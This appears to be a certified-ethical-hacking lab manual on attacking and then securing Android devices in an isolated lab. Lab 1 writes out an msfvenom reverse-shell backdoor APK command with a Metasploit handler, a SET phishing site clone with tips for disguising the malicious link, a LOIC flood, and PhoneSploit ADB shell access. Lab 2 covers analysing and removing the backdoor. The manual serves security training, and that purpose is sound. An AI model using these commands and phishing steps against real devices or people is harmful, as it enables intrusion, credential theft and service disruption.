Module 17: Hacking Mobile Platforms
55 Minutes Remaining
Module 17: Hacking Mobile Platforms
Scenario
With the advancement of mobile technology, mobility has become a key feature of Internet usage. People’s lifestyles are becoming increasingly reliant on smartphones and tablets. Mobile devices are replacing desktops and laptops, as they enable users to access email, the Internet, and GPS navigation, and to store critical data such as contact lists, passwords, calendars, and login credentials. In addition, recent developments in mobile commerce have enabled users to perform transactions on their smartphones such as purchasing goods and applications over wireless networks, redeeming coupons and tickets, and banking.
Most mobile devices come with options to send and receive text or email messages, as well as download applications via the Internet. Although these functions are technological advances, hackers continue to use them for malicious purposes. For example, they may send malformed APKs (application package files) or URLs to individuals to entice victims to click on or even install them, and so grant the attackers access to users’ login credentials, or whole or partial control of their devices.
Mobile security is becoming more challenging with the emergence of complex attacks that utilize multiple attack vectors to compromise mobile devices. These security threats can lead to critical data, money, and other information being stolen from mobile users and may also damage the reputation of mobile networks and organizations. The belief that surfing the Internet on mobile devices is safe causes many users to not enable their devices’ security software. The popularity of smartphones and their moderately lax security have made them attractive and more valuable targets to attackers.
As an expert ethical hacker or penetration tester, you should first test the mobile platform used by your organization for various vulnerabilities; then, using this information, you should secure it from possible attacks.
In this lab, you will obtain hands-on experience with various techniques of launching attacks on mobile platforms, which will help you to audit their security.
Objective
The objective of the lab is to carry out mobile platform hacking and other tasks that include, but are not limited to:
Exploit the vulnerabilities in an Android device
Obtain users’ credentials
Hack Android device with a malicious application
Use an Android device to launch a DoS attack on a target
Exploit an Android device through ADB
Perform a security assessment on an Android device
Overview of Hacking Mobile Platforms
At present, smartphones are widely used for both business and personal purposes. Thus, they are a treasure trove for attackers looking to steal corporate or personal data. Security threats to mobile devices have increased with the growth of Internet connectivity, use of business and other applications, various methods of communication available, etc. Apart from certain security threats that are specific to them, mobile devices are also susceptible to many other threats that are applicable to desktop and laptop computers, web applications, and networks.
Nowadays, smartphones offer broad Internet and network connectivity via varying channels such as 3G/4G/5G, Bluetooth, Wi-Fi, or wired computer connections. Security threats may arise while transmitting data at different points along these various paths.
Lab Tasks
Ethical hackers or penetration testers use numerous tools and techniques to attack target mobile devices. The recommended labs that will assist you in learning various mobile attack techniques include:
Hack android devices
Hack an Android device by creating binary payloads using Parrot Security
Harvest Users’ Credentials using the Social-Engineer Toolkit
Launch a DoS attack on a target machine using Low Orbital Cannon (LOIC) on the Android mobile platform
Exploit the Android platform through ADB using PhoneSploit
Secure Android Devices using Various Android Security Tools
Analyze a malicious app using online Android analyzers
Analyze a malicious app using Quixxi vulnerability scanner
Secure Android devices from malicious apps using Malwarebytes Security
Live Chat
Module 17: Hacking Mobile Platforms
55 Minutes Remaining
Lab 1: Hack Android Devices
Lab Scenario
The number of people using smartphones and tablets is on the rise, as these devices support a wide range of functionalities. Android is the most popular mobile OS, because it is a platform open to all applications. Like other OSes, Android has its vulnerabilities, and not all Android users install patches to keep OS software and apps up to date and secure. This casualness enables attackers to exploit vulnerabilities and launch various types of attacks to steal valuable data stored on the victims’ devices.
Owing to the extensive usage and implementation of bring your own device (BYOD) policies in organizations, mobile devices have become a prime target for attacks. Attackers scan these devices for vulnerabilities. These attacks can involve the device and the network layer, the data center, or a combination of these.
As a professional ethical hacker or pen tester, you should be familiar with all the hacking tools, exploits, and payloads to perform various tests mobile devices connected to a network to assess its security infrastructure.
In this lab, we will use various tools and techniques to hack the target mobile device.
Lab Objectives
Hack an Android device by creating binary payloads using Parrot Security
Harvest Users’ Credentials using the Social-Engineer Toolkit
Launch a DoS attack on a target machine using Low Orbital Cannon (LOIC) on the Android mobile platform
Exploit the Android platform through ADB using PhoneSploit
Overview of Hacking Android Platforms
Android is a software environment developed by Google for mobile devices. It includes an OS, a middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java AP Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer [HAL], and Linux kernel) and five layers.
Owing to the increase in the number of users with Android devices, they have become the primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spear phone attacks.
Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security
Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore target machines and execute code.
In this task, we will use Metasploit to create a binary payload in Parrot Security to hack an Android device.
Click Parrot Security 4.10 to switch to the Parrot Security machine.
Screenshot
In the login page, the attacker username will be selected by default. Enter password as toor in the Password field and press Enter to log in to the machine.
If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it.
If a Question pop-up window appears asking you to update the machine, click No to close the window.
Screenshot
Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
aaaa.jpg
A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.
Now, type cd and press Enter to jump to the root directory.
Screenshot
In the Parrot Terminal window, type service postgresql start and press Enter to start the database service.
Screenshot
Type msfvenom -p android/meterpreter/reverse_tcp –platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk and press Enter to generate a backdoor, or reverse meterpreter application.
This command creates an APK (Backdoor.apk) on Desktop under the Root directory. In this case, 10.10.10.13 is the IP address of the Parrot Security machine.
1211111.jpg
Now, share or send the Backdoor.apk file to the victim machine (in this lab, we are using the Android emulator as the victim machine).
In this task, we are sending the malicious payload through a shared directory, but in real-life cases, attackers may send it via an attachment in an email, over Bluetooth, or through some other application or means.
Execute the below commands to create a share folder:
If the shared folder is not present, navigate to /var/www/html and create a folder named share, using below commands:
Type mkdir /var/www/html/share and press Enter to create a shared folder
Type chmod -R 755 /var/www/html/share and press Enter
Type chown -R www-data:www-data /var/www/html/share and press Enter
Now, type service apache2 start and press Enter to start the Apache web server.
2.jpg
Type cp /root/Desktop/Backdoor.apk /var/www/html/share/ and press Enter to copy the Backdoor.apk file to the location share folder.
3.jpg
Type msfconsole and press Enter to launch the Metasploit framework.
In msfconsole, type use exploit/multi/handler and press Enter.
Screenshot
Now, issue the following commands in msfconsole:
Type set payload android/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.13 and press Enter.
Type show options and press Enter. This command lets you know the listening port (in this case, 4444), as shown in the screenshot.
Screenshot
Type exploit -j -z and press Enter. This command runs the exploit as a background job.
Screenshot
Click Android to switch to the Android emulator machine.
If the Android machine is non-responsive then, click Commands icon from the top-left corner of the screen, navigate to Power –> Reset/Reboot machine.
If Reset/Reboot machine pop-up appears, click Yes to proceed.
2020-06-15_09-32-34.png
In the Android Emulator GUI, click the Chrome icon on the lower section of the Home Screen to launch the browser
2020-08-27_10-59-46.jpg
In the address bar, type and press Enter.
If a Browse faster. Use less data. notification appears, click No thanks.
If a pop up appears, click Allow.
The Index of /share page appears; click Backdoor.apk to download the application package file.
Screenshot
After the download finishes, a notification appears at the bottom of the browser window. Click Open to open the application.
If Chrome needs storage access to download files, a pop-up will appear; click Continue. If any pop-up appears stating that the file contains a virus, ignore the message and download the file anyway.
In Allow Chrome to access photos, media, and files on your device?, click ALLOW.
If a warning message appears at the lower section of the browser window, click OK.
Screenshot
Open with option appears, choose Package installer and click Always.
1211.jpg
A MainActivity screen appears; click Next, and then Install.
Screenshot
After the application installs successfully, an App installed notification appears; click OPEN.
Screenshot
Click Parrot Security 4.10 switch back to the Parrot Security machine. The meterpreter session has been opened successfully, as shown in the screenshot.
In this case, 10.10.10.14 is the IP address of the victim machine (Android Emulator).
Screenshot
Type sessions -i 1 and press Enter. The Meterpreter shell is launched as shown in the screenshot.
In this command, 1 specifies the number of the session.
Screenshot
Type sysinfo and press Enter. Issuing this command displays the information the target machine such as computer name, OS, etc.
Screenshot
Type ipconfig and press Enter to display the victim machine’s network interfaces, IP address (IPv4 and IPv6), MAC address, etc. as shown in the screenshot.
Screenshot
Type pwd and press Enter to view the current or present working directory on the remote (target) machine.
Screenshot
Type cd /sdcard to change the current remote directory to sdcard.
The cd command changes the current remote directory.
Now, type pwd and press Enter. You will observe that the present working directory has changed to sdcard, that is, /storage/emulated/0.
Screenshot
Now, still in the Meterpreter session, type ps and press Enter to view the processes running in the target system.
The list of running processes might differ in your lab environment.
Because of poor security settings and a lack of awareness, if an individual in an organization installs a backdoor file on their device, the attacker gains control of the device. The attacker can then perform malicious activities such as uploading worms, downloading data, and spying on the user’s keystrokes, which can reveal sensitive information related to the organization as well as the victim
more…
Screenshot
Close all open windows.
Click Android to switch to the Android machine.
On the Home Screen, swipe up to navigate to the applications.
2020-08-27_11-14-51.jpg
In the applcations section, long click on MainActivity application and click App info.
Screenshot
App info page appears, cick UNINSTALL button to uninstall the application.
If a pop-up appears, click OK.
Screenshot
This concludes the demonstration of how to hack an Android device by creating binary payloads using Parrot Security.
Close all open windows and document all the acquired information.
Question 1.1.1:
Which of the following is the target machine in this task?
Ubuntu
Windows 10
Parrot Security
Windows Server 2019
Question 1.1.2:
What is the IPv4 address of the Android machine that is obtained in this task at interface 1?
10.10.10.10
10.10.10.13
10.10.10.14
10.10.10.16
Task 2: Harvest users’ credentials using the Social-Engineer Toolkit
The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. It is a generic exploit that can be used to carry out advanced attacks against human targets in order to get them to offer up sensitive information. SET categorizes attacks according to the attack vector used to trick people such as email, web, or USB. The toolkit attacks human weakness, exploiting people’s trust, fear, avarice, or helping natures.
In this task, we will sniff user credentials on the Android platform using SET.
Click Parrot Security 4.10 to switch to the Parrot Security machine.
Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
hgfds.jpg
A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.
Now, type cd and press Enter to jump to the root directory.
Screenshot
Type cd setoolkit and press Enter to navigate to the setoolkit folder.
Screenshot
Now, type ./setoolkit and press Enter to launch Social-Engineer Toolkit.
Screenshot
The SET menu appears, as shown in the screenshot. Type 1 and press Enter to choose Social-Engineering Attacks
Screenshot
A list of options for Social-Engineering Attacks appears; type 2 and press Enter to choose Website Attack Vectors.
Screenshot
A list of options in Website Attack Vectors appears; type 3 and press Enter to choose Credential Harvester Attack Method.
Screenshot
Type 2 and press Enter to choose Site Cloner from the menu.
Screenshot
Type the IP address of the local machine (10.10.10.13) in the prompt for “IP address for the POST back in Harvester/Tabnabbing” and press Enter.
In this case, we are targeting the Parrot Security machine (IP address: 10.10.10.13). These details may vary in your lab environment.
Now, you will be prompted for the URL to be cloned; type the desired URL in “Enter the url to clone” and press Enter. In this task, we will clone the URL http://certifiedhacker.com/Online%20Booking/index.htm.
You can clone any URL of your choice.
Screenshot
If a Press {return} if you understand what we’re saying here message appears, press Enter.
If a message appears asking Do you want to attempt to disable Apache?, type y and press Enter.
The cloning of the website completes, a highlighted message appears. The credential harvester initiates, as shown in the screenshot.
Screenshot
Having successfully cloned a website, you must now send the IP address of your Parrot Security machine to a victim and try to trick him/her into clicking on the link.
Click Firefox icon from the top-section of the Desktop to launch a web browser window and open your email account (in this example, we are using Mozilla Firefox and Gmail, respectively). Log in, and compose an email.
You can log in to any email account of your choice.
After logging into your email account, click the Compose button in the left pane and compose a fake but enticing email to lure a user into opening the email and clicking on a malicious link.
A good way to conceal a malicious link in a message is to insert text that looks like a legitimate online ticket booking account URL (in this case), but that actually links to your malicious cloned certifiedhacker page.
Position the cursor where you wish to place the fake URL, then click the Insert link icon.
WSW.jpg
In the Edit Link window, first type the actual address of your cloned site in the Web address field under the Link to section. Then, type the fake URL in the Text to display field. In this case, the actual address of our cloned certifedhacker site is , and the text that will be displayed in the message is ; click OK.
thtt.jpg
The fake URL should appear in the message body, as shown in the screenshot.
Verify that the fake URL is linked to the correct cloned site: in Gmail, click the link; the actual URL will be displayed in a “Go to link” pop-up. Once verified, send the email to the intended user.
ere.jpg
Click Android to switch to the Android machine.
In the Android Emulator GUI, click the Chrome icon on the lower section of the Home Screen to launch the browser
2020-08-27_10-59-46.jpg
In the Google Chrome browser window, sign in to the email account to which you sent the phishing mail as an attacker. Open the email you sent previously and click to open the malicious link.
wwwwwwww.jpg
When the victim (you in this case) clicks the URL, a new tab opens up, and he/she will be presented with a replica of www.certifiedhacker.com.
The hotel booking page appears, scroll-down to the end of the page. Here, the victim will be prompted to enter his/her username and password into the form fields, which appear as they do on the genuine website. When the victim enters the Username and Password and clicks Login, the page shows an error, as shown in the second screenshot.
2020-08-28_12-20-43.jpg
Screenshot
Click Parrot Security 4.10 to switch to the Parrot Security machine. In the terminal window, scroll down to find an Username and Password, displayed in plain text, as shown in the screenshot
2020-08-28_12-25-56.jpg
This concludes the demonstration of how to phish user credentials using SET.
Close all open windows and document all the acquired information
Question 1.2.1:
Which of the following attack vector is used in this task?
Credential Harvester Attack Method
Metasploit Browser Exploit Method
Tabnabbing Attack Method
Java Applet Attack Method
Question 1.2.2:
What is the IP address of the target machine in this task?
Task 3: Launch a DoS Attack on a Target machine using Low Orbital Cannon (LOIC) on the Android Mobile Platform
Low Orbit Ion Cannon (LOIC) is an open-source network stress testing and Denial-of-Service (DoS) attack application. LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.
In this task, we will use LOIC on the Android mobile platform to launch a DoS attack on a target machine.
Click Android to switch to the Android machine.
Click Commands icon from the top-left corner of the screen, navigate to Power –> Reset/Reboot machine.
If Reset/Reboot machine pop-up appears, click Yes to proceed.
2020-06-15_09-32-34.png
After the machine reboots, on the Home screen, swipe from right to left to navigate to the second page of the Home screen.
2020-06-15_16-45-07.png
On the second page of the Home screen, click the Cx File Explorer app.
2020-06-15_16-46-45.png
Cx File Explorer opens; click 10.10.10.10 from the Network tab and navigate to CEH-Tools –> CEHv11 Module 17 Hacking Mobile Platforms –> Android Hacking Tools –> Low Orbit Ion Cannon (LOIC).
2020-06-15_16-48-21.png
Click the Low Orbit Ion Cannon LOIC_v1.3.apk file.
Screenshot
A Do you want to install this application? screen appears, click INSTALL.
Screenshot
The installation begins; on completion, an App installed notification appears; click OPEN to launch the app.
Screenshot
On the LOIC screen, we will set a target website or machine. In this task, we shall launch a DoS attack on 10.10.10.19 machine.
In the left pane, in the URL field, type 10.10.10.19 and click the GET IP button.
The IP address of the target machine is displayed under the Manual IP option, as shown in the screenshot.
2020-09-08_17-30-04.jpg
To launch the attack, first select the TCP radio button; in the right pane, enter 80 as the Port number and in the Threads field, enter 100. Then, click the Start button, as shown in the screenshot.
2020-09-08_17-33-20.jpg
LOIC begins to flood the target website with TCP packets, which we will see by running Wireshark.
Click Windows Server 2019 switch to the Windows Server 2019 machine. Click Ctrl+Alt+Delete to activate the machine.
Alternatively, you can also click Ctrl+Alt+Delete button under Windows Server 2019 machine thumbnail in the Resources pane or Click Ctrl+Alt+Delete button under Commands (thunder icon) menu.
By default, Admin user profile is selected, click Pa$$w0rd to paste the password in the Password field and press Enter to login.
Alternatively, you can also click Pa$$w0rd under Windows Server 2019 machine thumbnail in the Resources pane or Click Type Text | Type Password button under Commands (thunder icon) menu.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and devices on the network.
Screenshot
On the Desktop, double-click Wireshark shortcut.
Screenshot
The Wireshark Network Analyzer opens; double-click on the primary network interface (in this case, Ethernet) to start capturing network traffic.
Screenshot
Wireshark starts capturing network packets. Note the huge number of packets coming from the attackers’ machine (in this case, Android, which has the IP address 10.10.10.14), as shown in the screenshot.
The packets from 10.10.10.14 are sent to the target machine (Windows Server 2019), whose IP address is 10.10.10.19.
Screenshot
Click the Stop capturing packets icon in the toolbar to stop the process.
2020-09-08_18-36-01.jpg
Observe the huge number of packets sent in the Packets field at the bottom of the Wireshark window, as shown in screenshot
2020-09-08_18-37-35.jpg
You can experience a degrade in a performance of the target machine Windows Server 2019.
Click Android to switch to the Android machine and in the LOIC application click STOP button to stop the attack.
Screenshot
Question 1.3.1:
What is the target addess on which the DoS attack was launched?
Question 1.3.2:
Name the primary network interface of Windows Server 2019 in this task
Ethernet
Ethernet 1
Eth0
Ethernet 2
Task 4: Exploit the Android Platform through ADB using PhoneSploit
Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.
Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.
In this task, we will exploit the Android platform through ADB using the PhoneSploit tool.
We will target the Android machine (10.10.10.14) using the Parrot Security machine.
If the Android machine is non-responsive then, click Commands icon from the top-left corner of the screen, navigate to Power –> Reset/Reboot machine. If Reset/Reboot machine pop-up appears, click Yes to proceed.
Click Parrot Security 4.10 to switch to the Parrot Security machine.
Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
wknfdjadbdna.jpg
A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.
Now, type cd and press Enter to jump to the root directory.
Screenshot
Now, type cd PhoneSploit and press Enter to navigate to the PhoneSploit folder.
By default, the tool will be cloned in the root directory.
Screenshot
Type python3 -m pip install colorama and press Enter to install the dependency.
Here, the dependency is already present.
Screenshot
Now, type python3 phonesploit.py and press Enter to run the tool
Screenshot
The PhoneSploit main menu options appear, as shown in the screenshot.
Screenshot
Type 3 and press Enter to select [3] Connect a new phone option.
When prompted to Enter a phones ip address, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
[!note] If you are getting Connection timed out error, then type 3 again and press Enter. If you do not get any option, then type 3 and press Enter again, until you get Enter a phones ip address option.
You will see that the target Android device (in this case, 10.10.10.14) is connected through port number 5555.
If you are unable to establish a connection with the target device, then press Ctrl+C and re-perform steps#8-11.
Screenshot
Now, at the main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
You can observe that a shell command line appears, as shown in the screenshot.
Screenshot
In the shell command line, type pwd and press Enter to view the present working directory on the target Android device.
In the results, you can observe that the PWD is the root directory.
Screenshot
Now, type ls and press Enter to view all the files present in the root directory.
Screenshot
Type cd sdcard and press Enter to navigate to the sdcard folder.
Screenshot
Type ls and press Enter to list all the available files and folders.
In this example, we will download an image file (images.jpeg) that we placed in the Android machine’s Download folder earlier; you can do the same before performing the next steps.
Screenshot
Type cd Download and press Enter to navigate to the Download folder.
Type ls and press Enter to list all the available files in the folder. In this case, we are interested in the images.jpeg file, which we downloaded earlier.
Note down the location of images.jpeg (in this example, /sdcard/Download/images.jpeg). We will download this file in later steps.
Screenshot
Type exit and press Enter to exit the shell command line and return to the main menu.
At the main_menu prompt, type 7 and press Enter to choose Screen Shot a picture on a phone.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
When prompted to Enter where you would like the screenshot to be saved, type /home/attacker/Desktop as the location and press Enter. The screenshot of the target mobile device will be saved in the given location. Minimize the Terminal window.
Screenshot
Click Places in the top section of the Desktop; then, from the context menu, click Desktop.
You should see the downloaded screenshot of the targeted Android device (screen.png). Double-click it if you wish to view the screenshot.
Screenshot
Close the Desktop window and switch back to the Terminal window.
At the main_menu prompt, type 14 and press Enter to choose List all apps on a phone.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
The result appears, displaying the installed apps on the target Android device, as shown in the screenshot.
Using this information, you can use other PhoneSploit options to either launch or uninstall any of the installed apps.
Screenshot
Now, at the main_menu prompt, type 15 and press Enter to choose Run an app. In this example, we will launch a calculator app on the target Android device.
Based on the information obtained in the previous step about the installed applications, you can launch any app of your choice.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
To launch the calculator app, type com.android.calculator2 and press Enter.
Screenshot
After launching the calculator app on the target Android device, click Android to switch to the Android machine.
You will see that the calculator app is running, and that random values have been entered, as shown in the screenshot.
The entered values might differ in your lab environment.
Screenshot
Click Parrot Security 4.10 to switch back to the Parrot Security machine. In the Terminal window, type p and press Enter to navigate to additional PhoneSploit options on the Next Page.
The result appears, displaying additional PhoneSploit options, as shown in the screenshot.
At the main_menu prompt, type 18 and press Enter to choose Show Mac/Inet information for the target Android device.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
The result appears, displaying the Mac/Inet information of the target Android device.
Screenshot
Now, at the main_menu prompt, type 21 and press Enter to choose the NetStat option.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
The result appears, displaying netstat information of the target Android device, as shown in the screenshot.
For demonstration purposes, in this task, we are exploiting the Android emulator machine. However, in real life, attackers use the Shodan search engine to find ADB-enabled devices and exploit them to gain sensitive information and carry out malicious activities.
Screenshot
In the same way, you can exploit the target Android device further by choosing other PhoneSploit options such as Install an apk on a phone, Screen record a phone, Turn The Device off, and Uninstall an app.
This concludes the demonstration of how to exploit the Android platform through ADB using PhoneSploit.
Document all the acquired information and close all open windows.
You can also use other Android hacking tools such as NetCut (http://www.arcai.com), drozer (https://labs.f-secure.com), zANTI (https://www.zimperium.com), Network Spoofer (https://www.digitalsquid.co.uk), and DroidSheep ) to hack Android devices.
Question 1.4.1:
What is the IP address of the Android machine?
Question 1.4.2:
Name the port through which the Android machine is connected in this task.
Live Chat
Module 17: Hacking Mobile Platforms
55 Minutes Remaining
Lab 2: Secure Android Devices using Various Android Security Tools
Lab Scenario
Like personal computers, mobile devices store sensitive data and are susceptible to various threats. Therefore, they should be properly secured in order to prevent the compromise or loss of confidential data, lessen the risk of various threats such as viruses and Trojans, and mitigate other forms of abuse. Strict measures and security tools are vital to strengthening the security of these devices.
Android’s growing popularity has led to increased security threats, ranging from typical malware to advanced phishing and identity theft techniques. As a professional ethical hacker or penetration tester, you should scan for any unsecured settings on the mobile device you are assessing, and then take appropriate action to secure them. You must do this before hackers exploit these vulnerabilities by; for example, downloading sensitive data, committing a crime using your Android device as a launchpad, and ultimately endangering your business.
There are various security tools available for scanning, detecting, and assessing the vulnerabilities and security status of Android devices. Many security software companies have launched their own apps, including several complete security suites with antitheft capabilities.
The tasks in this lab will assist you in performing a security assessment of a target Android device.
Lab Objectives
Analyze a malicious app using online Android analyzers
Analyze a malicious app using Quixxi vulnerability scanner
Secure Android devices from malicious apps using Malwarebytes Security
Overview of Android Security Tools
Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. These tools automate the process of accurate Android platform security assessment.
Task 1: Analyze a Malicious App using Online Android Analyzers
Online Android analyzers allow you to scan Android APK packages and perform security analyses to detect vulnerabilities in particular apps. Some trusted online Android analyzers are Sixo Online APK Analyzer.
In this task, we will analyze a malicious app using various online Android analyzers.
In this lab, we will be analyzing the malicious file (Backdoor.apk), which we used in the previous lab to hack the target Android platform.
If the malicious file (Backdoor.apk) is missing then follow the steps given in Lab 1 Task 1 (Hack an Android Device by Creating Binary Payloads using Parrot Security) to re-create the file.
Click Android to switch to the Android machine, click the Google Chrome browser icon on the Home screen to launch Chrome.
Restart the machine, if it non-responsive.
2020-06-24_00-54-07.png
In Chrome, type https://www.sisik.eu/apk-tool in the address bar and press Enter.
The Sixo Online APK Analyzer webpage loads, as shown in the screenshot.
If a cookie notification pop-up appears, click Got it!
Click the Drop APK here or click to select file field to upload an APK file from the device.
Sixo Online APK Analyzer allows you to analyze various details about Android APK files. It can decompile binary XML files and resources.
2020-06-24_00-55-49.png
In the Choose an action pop-up, click Files.
If Chrome pop-up appears, click ALLOW.
Screenshot
The Downloads screen appears; double-click the Backdoor.apk file.
If you find yourself in a folder called Recent, navigate to the Downloads folder by clicking on the ellipse icon in the top-left corner.
Screenshot
The browser window reappears with the information about the uploaded file (Backdoor.apk), as shown in the screenshot.
Screenshot
Scroll down to the Requested Permissions section to view information regarding the app’s requested permissions.
When an app wants to access resources or various device capabilities, it typically must request permission from the user to do so. Some permissions are granted by the user when installing the app and some need to be confirmed later while the app is running. The requested permissions are declared in the app’s AndroidManifest.xml file.
Screenshot
Scroll down to the AndroidManifest.xml section, which consists of essential information about the APK file.
The manifest file contains important information about the app that is used by development tools, the Android system, and app stores. It contains the app’s package name, version information, declarations of app components, requested permissions, and other important data. It is serialized into a binary XML format and bundled inside the app’s APK file.
more…
Screenshot
You can also scroll down to view information about the app’s APK Signature, App Source Code, etc.
This concludes the demonstration of analyzing a malicious app using online Android analyzers.
You can also use other online Android analyzers such as SandDroid (http://sanddroid.xjtu.edu.cn), Apktool (http://www.javadecompilers.com), and Apprisk Scanner ) to analyze malicious applications.
Close all open windows and document all the acquired information.
Question 2.1.1:
The malicious file that is being analyzed in this task is_____________
Task 2: Analyze a Malicious App using Quixxi Vulnerability Scanner
Quixxi is an intelligent and integrated end-to-end mobile app security solution. This powerful tool is for developers to protect and monitor any mobile apps in minutes.
In this task, we will analyze the malicious app using Quixxi’s free mobile app vulnerability scanner.
In the Android machine, click the Google Chrome browser icon on the Home screen to launch Chrome.
In Chrome, type https://vulnerabilitytest.quixxi.com/#/ in the address bar and press Enter.
The Quixxi website loads; click the Drag and drop or click here to scan your app field.
2020-06-24_10-22-20.png
When the Choose an action pop-up appears, click Files.
The Downloads screen appears; double-click Backdoor.apk.
Quixxi starts scanning the selected APK file (Backdoor.apk) for vulnerabilities.
Screenshot
After the scan finishes, the result appears under the Vulnerability Scan Report: A Summary section, listing the number of discovered vulnerabilities, risk threats, etc., as shown in the screenshot.
Screenshot
Click to expand Permissions Used node to view the permissions.
Screenshot
Scroll-down, click to expand CERTIFICATION INFORMATION node to view certification details.
Screenshot
Scroll-down further to view the OWASP information such as Issue, Severity, Assessment Status, CWE, Exploits, etc.
Screenshot
Screenshot
Screenshot
You can scroll-down and click on GET FULL REPORT button to generate a full report.
This concludes the demonstration of how to analyze a malicious app using the Quixxi vulnerability scanner.
You can also use other Android vulnerability scanners such as X-Ray (https://duo.com), Vulners Scanner (https://play.google.com), Shellshock Vulnerability Scan (https://play.google.com), Yaazhini (https://www.vegabird.com), and Quick Android Review Kit (QARK) (https://github.com) to analyze malicious apps for vulnerabilities.
Close all open windows and document all the acquired information.
Question 2.2.1:
What is the web browser used in this task to go to Quixxi website in this task?
Task 3: Secure Android Devices from Malicious Apps using Malwarebytes Security
Malwarebytes is an antimalware mobile tool that provides protection against malware, ransomware, and other growing threats to Android devices. It blocks, detects, and removes adware and malware; conducts privacy audits for all apps; and ensures safer browsing.
In this task, we will secure an Android device from malicious applications using Malwarebytes Security.
Click Android to switch to the Android machine.
Click Commands icon from the top-left corner of the screen, navigate to Power –> Reset/Reboot machine.
If Reset/Reboot machine pop-up appears, click Yes to proceed.
2020-06-15_09-32-34.png
After the machine reboots, on the Home screen, swipe from right to left to navigate to the second page of the Home screen.
2020-09-08_19-13-39.jpg
On the second page of the Home screen, click the Malwarebytes app.
2020-09-08_19-15-59.jpg
Malwarebytes Security initializes. A Let’s get you started message appears; click the Get started button to proceed.
Screenshot
In the permissions window, click Give permission.
Screenshot
A system pop-up appears, asking for permission; click ALLOW.
Screenshot
If trial version wizard appears, click the Start Premium trial button to start the free premium trial version of Malwarebytes Security.
The Your device is safe screen loads; click the Scan now button to start scanning the system.
2020-06-24_11-05-04.png
Malwarebytes Security begins a security scan, as shown in the screenshot.
Screenshot
After the completion of the scan, Scan finished message appears, click View scan results to see the results.
2020-06-24_11-07-22.png
A Threats screen appears. This will show you all the malware (if any) found on your device.
Here, the malware found is the malicious file Backdoor.apk.
Click the Remove selected button to remove the detected malware from your device.
2020-06-24_11-09-31.png
A confirmation pop-up appears; click OK to confirm the removal of the malware.
Screenshot
The Malwarebytes Scanner screen appears, notifying you that All items have been dealt with!.
Screenshot
Click Scan after update in the lower section of the Scanner window under Previous scans to view details of the scan.
2020-06-24_11-13-50.png
The Scanning history screen appears, displaying the deleted malicious file, as shown in the screenshot.
2020-06-24_11-16-43.png
This concludes the demonstration of how to secure Android devices from malicious apps using Malwarebytes Security.
You can use other mobile antivirus and anti-spyware tools such as AntiSpy Mobile (https://antispymobile.com), Spyware Detector – Anti Spy Privacy Scanner (https://play.google.com), iAmNotified – Anti Spy System (https://iamnotified.com), and Privacy Scanner (AntiSpy) Free (https://play.google.com) to secure mobile devices from malicious apps.
Close all open windows and document all the acquired information.
Question 2.3.1:
The name of the malware found in this task using Malwarebytes is______________
Live Chat